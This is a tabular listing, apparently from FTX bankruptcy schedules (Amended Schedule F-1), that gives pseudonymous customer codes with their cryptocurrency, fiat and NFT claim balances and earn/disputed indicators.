| 07398421 | | USD[1.17] | | |
| 07398423 | | ETHW[.00042685], USD[0.00], USDT[.004] | | |
| 07398427 | | BTC[.0042957], ETH[.315384], ETHW[.315384], SOL[.0744], USD[3.53] | | |
| 07398428 | | DOGE[700.23952532], SHIB[0], USD[0.00] | Yes | |
| 07398429 | | BTC[.00014391], CUSDT[2], DOGE[18.44365946], ETH[.00140455], ETHW[.00140455], USD[0.00] | | |
| 07398435 | | BAT[158.84306922], BRZ[6.60376731], CUSDT[42], DOGE[44.71468765], GRT[240.45078837], LTC[1.82509437], SOL[.30636437], SUSHI[1.11251533], TRX[3402.8873251], UNI[.00000957], USD[0.00], USDT[0.01] | Yes | |
| 07398443 | | CUSDT[1], USD[0.01] | | |
| 07398450 | | BAT[1], BRZ[2], CUSDT[1.99], DOGE[6785.27647446], LTC[1.94069695], TRX[2], USD[0.01] | | |
| 07398452 | | BAT[9.506611], BRZ[1], BTC[0], CUSDT[3], DAI[.00000001], DOGE[6.08201507], ETH[0], GRT[6.2674171], MATIC[1.01485741], SOL[0], SUSHI[1.06807205], TRX[4], UNI[0], USD[262.39], USDT[2.10072133] | Yes | |
| 07398453 | | CUSDT[4], TRX[21.55379477], USD[0.00] | | |
| 07398454 | | BTC[0], DOGE[.9] | | |
| 07398456 | | SUSHI[1.13606836], USD[0.00] | | |
| 07398458 | | SOL[.00000001], USD[35486.84] | | |
| 07398465 | | DOGE[2], USD[0.00] | | |
| 07398468 | | CUSDT[4], DOGE[2067.40064536], USD[0.00] | | |
| 07398473 | | BTC[.00065963], CUSDT[6], DOGE[202.42278963], LINK[.23741762], USD[0.13] | | |
| 07398477 | | USD[0.00] | | |
| 07398481 | | DOGE[5.23077374], USD[0.00] | | |
| 07398494 | | CUSDT[1], DOGE[377.88286316], LINK[2.92049108], SOL[12.02443703], SUSHI[23.58531448], TRX[1], USD[0.00] | | |
| 07398499 | | CUSDT[1], DOGE[118.27666561], USD[0.00] | | |
| 07398502 | | ETH[.00000001], ETHW[0], NFT [519598624748591990/SBF Hair & Signature #2 #122][1], SOL[0], USD[341.31] | | |
| 07398504 | | CUSDT[1], DOGE[28922.15962661], SHIB[1514817.25109502], TRX[1], USD[483.03], USDT[1.07648199] | Yes | |
| 07398510 | | SHIB[2], USD[0.01] | Yes | |
| 07398512 | | BTC[.00147606], CUSDT[4], TRX[1], USD[0.01] | | |
| 07398513 | | GRT[498] | | |
| 07398518 | | ETH[0], USD[0.00], USDT[0.37928528] | | |
| 07398520 | | BRZ[1.00000005], CUSDT[1], LINK[19.63231359], SUSHI[30.99745678], TRX[1], UNI[16.48672227], USD[549.07], USDT[0] | Yes | |
| 07398522 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07398531 | | USD[0.01] | | |
| 07398546 | | CUSDT[2], DOGE[.0000377], USD[1.00] | | |
| 07398548 | | TRX[189.97505437], USD[0.00] | | |
| 07398550 | | BTC[0], SOL[0], USD[0.10] | | |
| 07398557 | | BRZ[1], BTC[.00038125], CAD[0.00], DOGE[2161.81095329], ETH[.44245578], ETHW[.44245578], USD[-104.10] | | |
| 07398559 | | GRT[1], NFT (314656572051934080/Teammates)[1], NFT (368199353184563404/Mad Lions Series #42)[1], NFT (402983789990939242/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #51)[1], NFT (412379075684436937/Pix mix)[1], NFT (432844853865005840/Vegas Raiders )[1], NFT (432296953410886325/Rip )[1], NFT (440398966472899856/Legends #3 of 3)[1], NFT (498017844518780427/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #57)[1], SHIB[3824835.40213560], TRX[0], USD[0.27] | Yes | |
| 07398560 | | BAT[3], BRZ[14], CUSDT[37], DOGE[6], ETH[.35908226], ETHW[.35908226], SHIB[2], SOL[11.03972912], SUSHI[53.9823506], TRX[13], USD[0.00], USDT[4] | | |
| 07398561 | | USD[166.48] | Yes | |
| 07398562 | | BTC[.00471268], DOGE[188.09537719], ETH[.064628], ETHW[.0638249], LINK[6.26535507], MATIC[480.28151869], SHIB[5204235.6400415], SOL[8.83075577], USD[0.00] | Yes | |
| 07398565 | | BRZ[0], USD[0.00], USDT[0] | Yes | |
| 07398568 | | BTC[.00505865], CUSDT[1], DOGE[652.80420901], TRX[3], USD[30.01] | | |
| 07398572 | | USD[0.17], USDT[0] | | |
| 07398573 | | MATIC[5], USD[0.00] | | |
| 07398578 | | USD[0.00] | | |
| 07398580 | | SHIB[774.05470837], USD[0.00] | | |
| 07398581 | | BTC[0], GRT[2.91035], SOL[0], USD[1.24], USDT[0] | | |
| 07398582 | | BAT[.55708225], CUSDT[6], DOGE[3228.59815616], GRT[2], TRX[3], USD[0.45] | | |
| 07398584 | | USD[100.00] | | |
| 07398585 | | BTC[.00990282], CUSDT[2], DOGE[3], ETH[.20832295], ETHW[.20810635], MATIC[19.89491594], SHIB[1], TRX[2], USD[26.11] | Yes | |
| 07398587 | | ETH[.00000138], ETHW[.00000138], USD[0.00] | | |
| 07398589 | | NFT (378991730663226785/Prince of Saiyans Derivative)[1], NFT (387128145377090737/Bored Ape #197 )[1], NFT (388071922736634789/Bored Ape #5953)[1], NFT (412389548196766053/Lazy Bubblegum )[1], NFT (421899980052593403/[B]tcoin in the [S]ky with [D]iamonds )[1], NFT (450588243573101940/Bored Ape #1734)[1], NFT (469782502755051445/A Most Famous Ape Derivative )[1], NFT (480513393078075914/Like Father, Like Son. Derivative)[1], NFT (484276972902968816/Like Father, Like Son)[1], NFT (556267016013343848/Power over 9000)[1], NFT (560604188101533504/Prince of Saiyans )[1], NFT (565008250025726236/Curry Ape Derivative #7990)[1], USD[0.73] | | |
| 07398590 | | BAT[0], BTC[0], DOGE[0], ETH[0], ETHW[0], GBP[0.00], SHIB[0], UNI[0], USD[0.00] | | |
| 07398591 | | ETH[0], GRT[0], LTC[0.00334388], USD[2.25] | | |
| 07398596 | | DOGE[1], GRT[1], USD[0.01], USDT[4.86360696] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07398597 | | CUSDT[1], SHIB[1], TRX[2], USD[343.33], USDT[0] | | |
| 07398599 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07398601 | | USD[0.00] | | |
| 07398602 | | USD[3.26] | | |
| 07398603 | | SHIB[2], USD[0.01] | Yes | |
| 07398605 | | TRX[.293664], USD[3.15], USDT[2.12776072] | | |
| 07398608 | | BTC[0], CUSDT[0], DOGE[1], ETH[0], PAXG[0], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07398609 | | DOGE[5583.933], USD[0.00] | | |
| 07398614 | | USD[10.00] | | |
| 07398619 | | BTC[.00190136], CUSDT[2], DOGE[4], GRT[43.07253389], LINK[2.9675042], UNI[4.4863226], USD[0.01] | | |
| 07398627 | | USD[0.00] | | |
| 07398635 | | CUSDT[4], DOGE[202.6494745], USD[0.00] | Yes | |
| 07398636 | | CUSDT[2], DOGE[422.90003274], SHIB[1619195.15201627], USD[0.11] | Yes | |
| 07398637 | | CUSDT[1], DOGE[1], TRX[1], USD[0.00] | | |
| 07398648 | | BTC[0.00055512], ETH[.001], ETHW[.001], USD[0.01] | | |
| 07398650 | | BRZ[1.00866224], CAD[0.00], CUSDT[26.79481666], DAI[.00003257], LINK[.00000604], TRX[5.00001971], USD[0.02] | | |
| 07398651 | | DOGE[0], ETH[0], KSHIB[0], SHIB[3691.27429908], UNI[0], USD[0.00] | Yes | |
| 07398655 | | ALGO[50.04613979], AVAX[1.00092283], DOGE[15.19617812], ETHW[3.0027684], GRT[938.48373252], NEAR[5.00461368], SHIB[7], SOL[2.165384], TRX[2], UNI[5.00461398], USD[0.00], USDT[0] | Yes | |
| 07398657 | | BTC[.00349794], CUSDT[1], DOGE[31.32197004], MATIC[1.51425047], USD[0.00] | | |
| 07398660 | | DOGE[.00000001], SHIB[90022891.81054513], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07398661 | | DOGE[337.90792643], USD[0.00] | | |
| 07398669 | | CUSDT[2], SHIB[1209936.93489703], TRX[483.92535613], USD[0.03] | Yes | |
| 07398673 | | USD[0.05] | Yes | |
| 07398674 | | BTC[.00116716], NFT (360008314824303345/3D CATPUNK #2104)[1], NFT (448080214564514147/Anti Social Bot #684)[1], NFT (453368602906266883/3D CATPUNK #7810)[1], SOL[.34535272], USD[0.00] | Yes | |
| 07398679 | | USD[0.00], USDT[0] | | |
| 07398681 | | BAT[1], BRZ[2], CUSDT[12], DOGE[6463693], TRX[1.76442856], USD[0.01], USDT[1] | | |
| 07398684 | | USD[0.00], USDT[2.91729794] | | |
| 07398690 | | CUSDT[1], USD[0.01] | | |
| 07398691 | | DOGE[8311.62], USD[0.05] | | |
| 07398692 | | DOGE[1], USD[0.00] | | |
| 07398694 | | BAT[1], BRZ[1], CUSDT[5], USD[0.00], USDT[1] | | |
| 07398698 | | SOL[4.43], USD[1.41] | | |
| 07398699 | | CUSDT[1], DOGE[100.29864048], USD[0.00] | Yes | |
| 07398703 | | BRZ[1], BTC[0], GRT[1], UNI[.00000607], USD[0.00], USDT[0.00000001] | Yes | |
| 07398704 | | CUSDT[2], TRX[1625.80587026], USD[0.00] | | |
| 07398706 | | DOGE[0], ETH[0], LTC[0], USD[0.00], USDT[0.00002222] | | |
| 07398708 | | BRZ[1], CUSDT[16], DOGE[23.05442871], TRX[4], USD[185.14] | | |
| 07398710 | | DOGE[1], TRX[0] | | |
| 07398711 | | BRZ[1], CUSDT[1], USD[95.85] | | |
| 07398712 | | CUSDT[1], DOGE[5340.93004159], SHIB[1], TRX[0], USD[26.97] | | |
| 07398716 | | BTC[0], ETH[0], LINK[.00000001], UNI[0], USD[0.00], USDT[0] | | |
| 07398724 | Contingent, Disputed | BAT[1], CUSDT[2], DOGE[5], GRT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07398727 | | MATIC[52.77759091], USD[21.11] | Yes | |
| 07398729 | | BTC[.00049857], CUSDT[7], DOGE[50.56242982], ETH[.00447353], ETHW[.00447353], LINK[.63743796], USD[0.01] | | |
| 07398730 | | USD[0.00], USDT[0] | Yes | |
| 07398731 | | BTC[.01827659], DOGE[4134.86240157], TRX[1], USD[0.00] | | |
| 07398739 | | BTC[0], CUSDT[2], DOGE[0], SHIB[1338740.13186660], TRX[3], USD[0.00] | | |
| 07398740 | | BTC[.0007872], DOGE[.382], LTC[.15584], SHIB[97500], USD[0.04], USDT[.007] | | |
| 07398751 | | BAT[3], CUSDT[3], TRX[3], UNI[1], USD[0.01] | | |
| 07398762 | | CUSDT[2], DOGE[2952.96668315], LINK[5.13540573], NFT (306938719665079797/Entrance Voucher #3520)[1], NFT (390097191195271729/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #27)[1], SHIB[123853.93315934], SOL[3.18819506], TRX[981.28927703], USD[0.00] | Yes | |
| 07398768 | | BRZ[2], BTC[.00744414], CUSDT[12], DOGE[766.78357613], ETH[.11891983], ETHW[.11891983], SOL[4.89406824], USD[0.00], USDT[0.00000001], YFI[.00115824] | | |
| 07398769 | | AAVE[.04029446], ALGO[4.65952034], BAT[38.11078824], BCH[0.09067200], BRZ[0], BTC[0.00662844], CUSDT[3], DOGE[252.75254296], ETH[0.03258200], ETHW[0.03217568], GRT[30.48624987], LINK[1.06310215], LTC[0.00268802], MATIC[7.96953775], MKR[.00276374], SHIB[51094.54921969], SOL[0.79502943], SUSHI[5.78233946], TRX[243.87194435], UNI[1.62590778], USD[21.30], YFI[0.00104686] | Yes | |
| 07398770 | | TRX[1], USD[0.00] | | |
| 07398778 | | BAT[2.12996541], BRZ[2], CUSDT[9], DOGE[18392.03118381], SHIB[7526972.49584058], TRX[2], UNI[1.10896168], USD[0.00], USDT[0] | Yes | |
| 07398783 | | USD[0.00], USDT[0] | | |
| 07398786 | | CUSDT[236.52916628], TRX[1], USD[8.03], USDT[4.9735279] | | |
| 07398789 | | BTC[0], ETH[.00059655], ETHW[0.00059654], USDT[3.6125604] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07398793 | | BTC[0.00923770], USD[1.58], USDT[3.620986] | | |
| 07398794 | | USD[6.97] | | |
| 07398799 | | BAT[1.01275749], BRZ[3], CUSDT[51.23293694], DOGE[144.30009366], ETH[.00000001], ETHW[0], GRT[1.00369769], TRX[13.41857883], USD[0.00] | Yes | |
| 07398801 | | CUSDT[1], USD[0.00] | | |
| 07398804 | | USD[0.00] | | |
| 07398808 | | SUSHI[.00246934], USD[0.00] | | |
| 07398810 | | CUSDT[5], DOGE[0], TRX[1], USD[0.00] | Yes | |
| 07398814 | | CUSDT[1662.77510147], USD[0.00] | Yes | |
| 07398815 | | USD[0.01] | | |
| 07398819 | | BTC[.00710099], CUSDT[4], DOGE[ 29602429], ETH[.41152127], ETHW[.41152127], TRX[2], USD[0.00] | | |
| 07398820 | | BRZ[1], CUSDT[19], DOGE[41.22537985], ETH[.19077023], ETHW[.19055099], GRT[1.00280759], LINK[14.68367929], NFT[300415724673040737/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #98][1], NFT[350857907635203462/Dog pig ][1], NFT[360591818642535227/Crypto Playbook #2][1], NFT[362527169095706000/Silver oz][1], NFT[384106445113030848/AI-generated landscape #118][1], NFT[538085543504797962/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #101][1], SHIB[144.69106463], TRX[356.54348221], USD[0.00] | Yes | |
| 07398823 | | BAT[2], BRZ[1], CUSDT[7], DOGE[1.00873955], ETH[0], ETHW[0], GRT[1], LTC[0.00036185], SUSHI[2.70745713], TRX[7], USDT[1.20684557] | | |
| 07398827 | | BTC[0], DOGE[0], SHIB[55795.87912866], USD[2012.10] | | |
| 07398830 | | ETHW[.01425074], SHIB[3], USD[237.35] | | |
| 07398840 | | BRZ[1], CUSDT[1], DOGE[0], TRX[1], USD[0.44] | | |
| 07398842 | | ETH[.00074882], ETHW[.00062975], USD[0.00], USDT[0] | | |
| 07398843 | | DOGE[0], USD[706.87] | | |
| 07398849 | | LINK[1], USD[0.00], USDT[0] | | |
| 07398850 | | DOGE[0], USD[0.00] | | |
| 07398855 | | CUSDT[1], ETH[2.61654879], ETHW[2.61654879], USD[0.00] | | |
| 07398857 | | GRT[.00101669], USD[0.00] | | |
| 07398860 | | BRZ[1], ETH[0] | | |
| 07398861 | | ETH[0], UNI[0], USD[0.01] | | |
| 07398864 | | BTC[0], DOGE[.54071569], USD[0.54] | | |
| 07398865 | | BRZ[3], CUSDT[1], DOGE[2], TRX[2], USD[0.00] | | |
| 07398866 | | DOGE[1], ETH[.0082822], ETHW[.0082822], USD[0.00] | | |
| 07398873 | | USD[0.01] | Yes | |
| 07398875 | | BTC[0], DOGE[1], ETH[0], GRT[0], LINK[0], TRX[1], UNI[0], USD[0.00] | | |
| 07398876 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07398877 | | USD[0.02], USDT[1.45] | | |
| 07398879 | | NFT[325826019127466438/Hungary Ticket Stub #116][1], NFT[344376732859168268/Microphone #1406][1], NFT[357582970365729711/Series 1: Capitals #435][1], NFT[363866770002261382/Barcelona Ticket Stub #2270][1], NFT[409644475179373261/FTX - Off The Grid Miami #514][1], NFT[410621329315892380/Hungary Ticket Stub #309][1], NFT[415191090470919995/Series 1: Wizards #396][1], NFT[463331594342290248/Humpty Dumpty #615][1], NFT[514109035780146141/Entrance Voucher #29708][1], NFT[552641624198257901/FTX - Off The Grid Miami #527][1], NFT[571731997413321794/Entrance Voucher #1481][1], USD[0.00], USDT[.08294567] | Yes | |
| 07398885 | | BAT[0], BTC[0], DAI[0], DOGE[0], ETH[0], GRT[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[1.78], YFI[0] | | |
| 07398889 | | SOL[.0328], SUSHI[.2514], USD[63.21], USDT[.328082] | | |
| 07398892 | | BTC[.00000045], USD[3.85] | | |
| 07398893 | | BRZ[1], BTC[.00336], CUSDT[1], DOGE[3], ETH[.05125327], ETHW[.05125327], NFT[502611268138625731/Coachella x FTX Weekend 2 #23557][1], SHIB[1], SOL[.00003248], TRX[2], USD[0.00] | | |
| 07398894 | | BAT[0], DOGE[1], ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07398895 | | TRX[1041.8584877], USD[0.01] | Yes | |
| 07398903 | | USD[0.00] | Yes | |
| 07398924 | | BRZ[6.31298262], CUSDT[41], DOGE[1], ETH[.19842023], ETHW[1.48250239], NEAR[7.32211817], SHIB[2], TRX[12], USD[0.00], USDT[2.11575274] | Yes | |
| 07398930 | | USD[46.61] | | |
| 07398945 | | BAT[1], CUSDT[1], SHIB[6.55205916], USD[0.00] | | |
| 07398947 | | BRZ[1], DOGE[3836.3828503], ETH[.85466751], ETHW[.85466751], GRT[2], TRX[2], USD[2515.35], USDT[1] | | |
| 07398951 | | SHIB[2], SOL[0], TRX[1], USD[0.01] | Yes | |
| 07398952 | | DOGE[486.91341084], GRT[1], USD[0.00] | | |
| 07398959 | | DOGE[42563.80527229], GRT[1], USD[0.00] | | |
| 07398967 | | AVAX[1.20459159], ETHW[.19540713], USD[0.69], USDT[24.98499] | | |
| 07398968 | | CUSDT[2], DOGE[0], ETHW[.19287366], SOL[0], USD[0.00] | | |
| 07398972 | | BRZ[1], CUSDT[3], DOGE[608.3338846], ETH[.44752296], ETHW[.44733073], LTC[1.17222902], NFT[449881643339142744/FTX - Off The Grid Miami #2404][1], USD[0.00] | Yes | |
| 07398977 | | NFT[450627728758348470/Red Panda #118][1], SHIB[4], USD[0.00] | | |
| 07398978 | | BF_POINT[800], BRZ[1], BTC[0], CUSDT[2], DOGE[6], ETHW[.29466751], NFT[497865032249438625/Shaq's Fun House presented by FTX #50][1], SHIB[1], SOL[.00001042], SUSHI[.00001152], TRX[4], USD[8431.73] | Yes | |
| 07398979 | | BTC[0.00004620], DOGE[.561], ETH[.00048235], ETHW[.00048235], LINK[.0159], MATIC[9.5], SOL[.03332], SUSHI[.4885], TRX[.345], USD[26.74], USDT[0.00506204] | | |
| 07398980 | | CUSDT[1], DOGE[1], USD[0.92] | | |
| 07398982 | | CUSDT[1], DOGE[.81414834], USD[9.23] | | |
| 07398984 | | SOL[0], USDT[0] | | |
| 07398990 | | MATIC[0], NEAR[.01727752], SOL[0], USD[0.00] | Yes | |

Amended Schedule F-1 Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07399007 | | BTC[.00022121], CUSDT[1], DOGE[29.31062924], ETH[.00283196], ETHW[.00283196], LINK[.25291133], TRX[42.56735645], USD[0.00] | | |
| 07399011 | | CUSDT[2], TRX[4], USD[0.00] | Yes | |
| 07399017 | | CUSDT[1], DOGE[.00007807], USD[0.01] | | |
| 07399018 | | BTC[.00018665], NFT (556956844448467970)/Entrance Voucher #4195)[1], PAXG[.0027025], USD[0.00] | | |
| 07399019 | | CUSDT[3], DOGE[1786.06483414], TRX[1188.09005359], USD[0.00] | | |
| 07399022 | | ETH[.00000287], ETHW[0.00002869], NFT (299848299185679112/GSW Western Conference Semifinals Commemorative Ticket #165)[1], NFT (324542608139260174/GSW Western Conference Semifinals Commemorative Ticket #167)[1], NFT (368625320857592470/GSW Western Conference Finals Commemorative Banner #339)[1], NFT (390814081661467002/GSW Western Conference Semifinals Commemorative Ticket #168)[1], NFT (392780782761820536/GSW Round 1 Commemorative Ticket #236)[1], NFT (393288002304975326/GSW Championship Commemorative Ring)[1], NFT (407941457539769742/GSW Championship Commemorative Ring)[1], NFT (418601329507913739/GSW Western Conference Finals Commemorative Banner #337)[1], NFT (452837781378130401/GSW Western Conference Finals Commemorative Banner #342)[1], NFT (457312416759561041/GSW Round 1 Commemorative Ticket #235)[1], NFT (461224529985124800/GSW Western Conference Finals Commemorative Banner #343)[1], NFT (473087800416315478/GSW Western Conference Finals Commemorative Banner #340)[1], NFT (475160605335145004/GSW Western Conference Finals Commemorative Banner #344)[1], NFT (475785695272902938/The Finale at Oracle Ticket #31 (Redeemed))[1], NFT (489720084870231532/GSW Round 1 Commemorative Ticket #237)[1], NFT (494832651879030244/Warriors Hoop #91 (Redeemed))[1], NFT (495177913447308627/Warriors Hardwood Court #62 (Redeemed))[1], NFT (513692520697603947/Warriors Hoop #235 (Redeemed))[1], NFT (533224099573187717/GSW Western Conference Semifinals Commemorative Ticket #166)[1], NFT (552839197810328181/GSW Championship Commemorative Ring)[1], NFT (554269637665218642/GSW Championship Commemorative Ring)[1], NFT (566829365335851201/Australia Ticket Stub #873)[1], NFT (570585104154247499/GSW Western Conference Finals Commemorative Banner #341)[1], NFT (572240820351434067/GSW Western Conference Finals Commemorative Banner #338)[1], SOL[.01], USD[0.00] | | |
| 07399023 | | ETH[0.00000565], ETHW[0.00000565], USD[1001.97], USDT[0] | Yes | |
| 07399040 | | BAT[1.0165555], BRZ[1], CUSDT[3], DOGE[1], GRT[2.08023389], TRX[4], USD[13.99], USDT[0] | Yes | |
| 07399042 | | NFT (411421094234887641/Aku World Avatar #30)[1], USD[38.70] | | |
| 07399048 | | DOGE[653.8644], GRT[12.9563], USD[0.11] | | |
| 07399051 | | BRZ[1], CUSDT[2], DOGE[1910.19563429], USD[0.00] | | |
| 07399054 | | USD[0.00], USDT[0] | | |
| 07399057 | | USD[0.00], USDT[.00944062] | | |
| 07399060 | | BRZ[1], BTC[.00100694], CUSDT[2], DOGE[2359.58286014], USD[0.00] | | |
| 07399061 | | DOGE[2.39663585], USD[0.00] | | |
| 07399063 | | ETH[.00000014], ETHW[.00000014], GRT[.00845417], NFT (338453637590656763/Saudi Arabia Ticket Stub #1859)[1], NFT (435337818960082942/Barcelona Ticket Stub #1317)[1], NFT (568168122664342124/Entrance Voucher #1809)[1], SHIB[353.35823048], SOL[.00000921], SUSHI[.00075057], TRX[1], USD[0.01], USDT[0.00000956] | Yes | |
| 07399094 | | TRX[0.32706619], USD[0.00], USDT[0.00052113] | | |
| 07399096 | | ALGO[0], BTC[0], ETHW[4.27303456], LINK[0], SOL[0], USD[0.64] | | |
| 07399106 | | USD[0.01] | | |
| 07399122 | | SUSHI[9.19478883], USD[0.00], USDT[1] | | |
| 07399127 | | ETH[.0271415], ETHW[.0271415], USD[0.00] | | |
| 07399128 | | BCH[0], DOGE[0], SOL[0], USD[0.52] | | |
| 07399135 | | USD[0.01] | | |
| 07399147 | | LTC[0], USD[0.00] | | |
| 07399150 | | BRZ[1], ETH[2.73745791], ETHW[2.73745791], USD[0.00] | | |
| 07399152 | | BRZ[1], CUSDT[6], DOGE[2444.49662995], TRX[227.31622123], USD[0.00], USDT[4.96905708] | | |
| 07399156 | | CUSDT[3], USD[26.86] | | |
| 07399161 | | BAT[1.01632349], CUSDT[1], SHIB[3376806.97857874], TRX[1], USD[0.00] | Yes | |
| 07399164 | | CUSDT[5], TRX[3], USD[0.00], USDT[0] | | |
| 07399173 | | USD[0.01] | | |
| 07399174 | | CUSDT[8], GRT[1.00367791], TRX[7], USD[0.00] | Yes | |
| 07399177 | | BTC[.0008042], CUSDT[4], DOGE[8.00000158], TRX[3], USD[0.00] | | |
| 07399179 | | BAT[1.0165555], BRZ[1], CUSDT[1], DOGE[12498.66932166], TRX[1], USD[0.07], USDT[1.09659459] | Yes | |
| 07399187 | | BTC[0], ETH[0.06084389], ETHW[0], SOL[2.86589117], USD[0.00] | | |
| 07399190 | | USD[0.01] | | |
| 07399198 | | DOGE[1], SOL[6.59147785], TRX[1057.90205448], USD[0.00] | Yes | |
| 07399200 | | TRX[1], USD[0.01] | | |
| 07399202 | | CUSDT[3], TRX[2], USD[99.70] | | |
| 07399203 | | BCH[.000032], ETH[.00014], ETHW[1.53384], LTC[.00512], USD[0.49], USDT[.02404523] | | |
| 07399204 | | BRZ[1], CUSDT[1], DOGE[2], ETH[0], ETHW[0], SHIB[3], TRX[1], USD[0.00], USDT[0.00000013] | | |
| 07399211 | | BTC[0], SHIB[520689.18770597], SOL[.04705073], USD[0.00], USDT[0.00000002] | | |
| 07399216 | | DOGE[6.972], GRT[0], USD[0.14] | | |
| 07399221 | | USD[0.00] | | |
| 07399222 | | USD[0.00] | | |
| 07399225 | | BTC[0], CUSDT[7], DOGE[4], GRT[122.35611020], LTC[0], SHIB[9], TRX[4], USD[0.00], USDT[0.00000922] | Yes | |
| 07399228 | | BTC[.00102668], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07399234 | | BTC[0.00000340], USD[0.00], USDT[0] | | |
| 07399236 | | BTC[.02270807], CUSDT[2], DOGE[645.86104786], ETH[1.25022127], ETHW[1.25022127], LINK[6.21666936], TRX[2], USD[0.00] | | |
| 07399237 | | BRZ[1], CUSDT[20], SHIB[472695.79513561], TRX[2.00002323], USD[1.40], USDT[0] | | |
| 07399239 | | BRZ[1], CUSDT[17], DOGE[333.92735065], SHIB[27141.23873232], TRX[1], USD[0.01] | Yes | |
| 07399242 | | BAT[40.33071639], CUSDT[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07399243 | | DOGE[1], TRX[3], USD[0.00] | | |
| 07399244 | | BAT[1.0165447], BTC[.05648855], DOGE[1], ETH[1.5618045], ETHW[1.56114854], USD[0.00] | Yes | |
| 07399249 | | AAVE[0], AUD[0.00000002], AVAX[0.00000002], BCH[0], BTC[0], CAD[0.00], DAI[0], DOGE[0.00000001], ETH[0], EUR[0.00], GBP[0.00], GRT[0], LINK[0], LTC[0], MATIC[0], MKR[0], NFT [426510599404440261/FTX US VIP #1][1], PAXG[0], SOL[0.00000001], SUSHI[0], TRX[0], UNI[0], USD[0.01], USDT[0], WBTC[0], YFI[0] | | |
| 07399257 | | CUSDT[1], DOGE[1], TRX[16789.11346507], USD[0.00] | Yes | |
| 07399262 | | BCH[0.00000101], BTC[0.00000019], ETH[0.00000028], ETHW[0.00000029], LINK[.00003543], LTC[.00000392], MATIC[0.00162538], SHIB[0.00000412], SOL[0.00000870], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07399267 | | TRX[69.81082522], USD[35.00] | | |
| 07399273 | | CUSDT[4], TRX[1], USD[0.97] | | |
| 07399275 | | BTC[.0692307], ETH[1.075923], ETHW[1.075923], SUSHI[39.4605], USD[5.78] | | |
| 07399279 | | BAT[2.0940145], CUSDT[4], DOGE[32710.73400143], TRX[6], USD[0.01], USDT[1.0903036] | | |
| 07399282 | | BRZ[1], CUSDT[1], DOGE[877.97070189], USD[0.00] | Yes | |
| 07399283 | | NFT [295169352394296099/Entrance Voucher #2197][1], USD[0.00] | Yes | |
| 07399288 | | USD[0.00] | | |
| 07399289 | | TRX[0], USD[0.00], USDT[0] | | |
| 07399293 | | BTC[0.00003341], CUSDT[3], USD[0.00] | | |
| 07399297 | | SOL[.067], USD[23.23] | | |
| 07399300 | | USD[0.00] | | |
| 07399305 | | USD[0.09] | | |
| 07399311 | | BAT[1], BTC[0], CUSDT[2], DOGE[1], GRT[1], PAXG[0], SHIB[1], USD[0.00] | | |
| 07399317 | | BTC[0], TRX[.011181], USD[0.00], USDT[0] | | |
| 07399318 | | CUSDT[1], USD[0.00] | | |
| 07399319 | | CUSDT[1], DOGE[1], KSHIB[50.36374262], USD[0.00] | Yes | |
| 07399320 | | BRZ[1], BTC[.00487122], USD[0.00] | Yes | |
| 07399321 | | DOGE[191.43859788], TRX[1], USD[0.00] | | |
| 07399323 | | DOGE[9124.00814106], USD[0.00] | Yes | |
| 07399331 | | CUSDT[1], USD[0.00] | | |
| 07399333 | | CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07399336 | | BAT[1], BRZ[1], CUSDT[1186.16759521], GRT[2], TRX[5], USD[2006.22], USDT[2] | | |
| 07399340 | | BRZ[1], BTC[0], CUSDT[5], DOGE[0], LINK[0], LTC[0], USD[0.00] | | |
| 07399341 | | BTC[0.01297625], DOGE[2443.6763], ETHW[1.64962], LINK[12], SHIB[38863045], SOL[39.8053355], SUSHI[20.922575], USD[285.56], USDT[679.97840625] | | |
| 07399343 | | BTC[.00377657], DOGE[1], TRX[0] | | |
| 07399344 | | BTC[0], DOGE[0], ETH[0], MATIC[0], SOL[0], USD[1.08], USDT[0] | | |
| 07399345 | | BTC[.0008619], CUSDT[3], DOGE[1504.35790462], USD[5.53] | Yes | |
| 07399351 | | CUSDT[1], USD[0.00] | Yes | |
| 07399354 | | BAT[0], BRZ[0], BTC[0], CUSDT[0], DAI[0], DOGE[0], TRX[0], USD[0.00] | | |
| 07399360 | | ETHW[.37913955], USD[0.00], USDT[0], YFI[.0009848] | | |
| 07399365 | | BAT[1.0165555], BRZ[8.87653649], CUSDT[2], DOGE[2], GRT[3.18790626], USD[0.01], USDT[1.10981256] | Yes | |
| 07399366 | | BAT[0], USD[0.00] | | |
| 07399374 | | BAT[1], BRZ[3], CUSDT[3], DOGE[3], TRX[388.40251433], USD[0.00] | | |
| 07399380 | | DOGE[0.00598417], TRX[643.57356709], USD[0.00], USDT[0.03638149] | | |
| 07399382 | | USD[0.00] | | |
| 07399384 | | CUSDT[3], DOGE[123.56840730], USD[0.00] | | |
